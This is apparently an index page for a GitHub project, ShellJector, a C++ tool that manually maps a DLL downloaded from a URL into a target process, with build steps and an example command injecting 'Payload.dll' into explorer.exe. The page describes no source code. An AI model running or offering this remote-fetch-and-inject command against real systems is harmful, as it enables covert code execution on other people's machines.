https://github.com/wolf49406/shelljector
Manual map shellcode (aka byte array) injector
https://github.com/wolf49406/shelljector
injection injector shellcode shellcode-injection shellcode-injector
Last synced: 9 months ago
JSON representation
Manual map shellcode (aka byte array) injector
- Host: GitHub
- URL: https://github.com/wolf49406/shelljector
- Owner: Wolf49406
- License: gpl-3.0
- Created: 2021-05-17T12:13:56.000Z (over 4 years ago)
- Default Branch: main
- Last Pushed: 2024-12-20T12:35:54.000Z (about 1 year ago)
- Last Synced: 2025-04-02T11:08:07.301Z (9 months ago)
- Topics: injection, injector, shellcode, shellcode-injection, shellcode-injector
- Language: C++
- Homepage:
- Size: 784 KB
- Stars: 68
- Watchers: 4
- Forks: 20
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# ShellJector (v2.0)
Manual map shellcode (aka byte array) injector wich can download DLL from the internet by URL
Also take a look at [local](https://github.com/Wolf49406/ShellJectorLocal) version!
[](https://github.com/Wolf49406/ShellJector/actions/workflows/msbuild.yml)
## How to Build:
- Open `ShellJector.sln -> main.cpp`;
- Set `ProcName` and `DllURL`;
- Build;
## Usage:
- Go to \ShellJector\Build;
- OR just download the [Latest Release](https://github.com/Wolf49406/ShellJector/releases/latest);
- Set launch arguments (down below);
- Open Target Process;
- Open `ShellJector.exe`;
## Arguments:
You can set `ProcName` and `DllURL` with `-proc` and `-url` arguments
(ex: `ShellJector.exe -proc explorer.exe -url "https://example.com/Payload.dll"`)
Arguments are case **sensitive**!
## Stargazers over time
[](https://starchart.cc/Wolf49406/ShellJector)